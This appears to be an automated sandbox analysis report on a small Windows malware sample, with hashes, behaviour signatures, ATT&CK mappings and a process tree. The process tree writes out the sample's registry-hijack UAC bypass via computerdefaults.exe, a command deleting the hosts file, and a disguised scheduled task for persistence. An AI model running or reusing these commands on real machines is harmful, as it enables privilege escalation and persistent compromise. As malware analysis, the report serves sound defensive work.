Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30-05-2024 21:51

General

  • Target

    easfawefawfas.exe

  • Size

    12KB

  • MD5

    2813b6e3ed4bd6b14c53e3dffcdff21d

  • SHA1

    5ac7c7a3dadde70f94810c608a2eb275f14b7bde

  • SHA256

    866c0294731f195b0b9efa4f9b7cac352e8de5121f63a458a75efed3a625d24a

  • SHA512

    ff2454992a5fbe5c8cfab149ebd5edaa089ab4f25b88a47c5da0348575a72f1de372c8e762f74f284070a7a2e1209202ca755b4c08dd99799ac5bb9a598e0a24

  • SSDEEP

    192:LsNqFnJvOXdub8t6QP+TXVKTl1hAKje2Ecp0Gun8JZcxZQF:LsNvuI6QIKTHhA8rt0nnicxo

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\easfawefawfas.exe
    "C:\Users\Admin\AppData\Local\Temp\easfawefawfas.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4856
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\consoleitaly1826.vbs" /f
      2⤵
      • Modifies registry class
      PID:4876
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
      2⤵
      • Modifies registry class
      PID:1944
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C computerdefaults.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4540
      • C:\Windows\SysWOW64\ComputerDefaults.exe
        computerdefaults.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3316
        • C:\Windows\SysWOW64\wscript.exe
          "wscript.exe" C:\Users\Admin\AppData\Local\Temp\consoleitaly1826.vbs
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
            5⤵
              PID:4080
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN AVGUpdateService_gKwwuP9Gdga87vtVr050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\gKwwuP9Gdga87vtVr050MX.exe" /RL HIGHEST /IT
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4388
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /Create /SC ONLOGON /TN AVGUpdateService_gKwwuP9Gdga87vtVr050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\gKwwuP9Gdga87vtVr050MX.exe" /RL HIGHEST /IT
          3⤵
          • Creates scheduled task(s)
          PID:1872

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Scheduled Task/Job

    1
    T1053

    Persistence

    Scheduled Task/Job

    1
    T1053

    Privilege Escalation

    Scheduled Task/Job

    1
    T1053

    Discovery

    System Information Discovery

    1
    T1082

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\consoleitaly1826.vbs
      Filesize

      171B

      MD5

      a34267102c21aff46aecc85598924544

      SHA1

      77268af47c6a4b9c6be7f7487b2c9b233d49d435

      SHA256

      eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44

      SHA512

      5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3

    • memory/4856-0-0x00000000751AE000-0x00000000751AF000-memory.dmp
      Filesize

      4KB

    • memory/4856-1-0x00000000007B0000-0x00000000007BC000-memory.dmp
      Filesize

      48KB

    • memory/4856-2-0x0000000005100000-0x000000000511A000-memory.dmp
      Filesize

      104KB

    • memory/4856-3-0x0000000002B00000-0x0000000002B0A000-memory.dmp
      Filesize

      40KB

    • memory/4856-4-0x0000000005240000-0x00000000052D2000-memory.dmp
      Filesize

      584KB

    • memory/4856-5-0x0000000005890000-0x0000000005E36000-memory.dmp
      Filesize

      5.6MB

    • memory/4856-6-0x00000000751A0000-0x0000000075951000-memory.dmp
      Filesize

      7.7MB

    • memory/4856-10-0x00000000751AE000-0x00000000751AF000-memory.dmp
      Filesize

      4KB

    • memory/4856-11-0x00000000751A0000-0x0000000075951000-memory.dmp
      Filesize

      7.7MB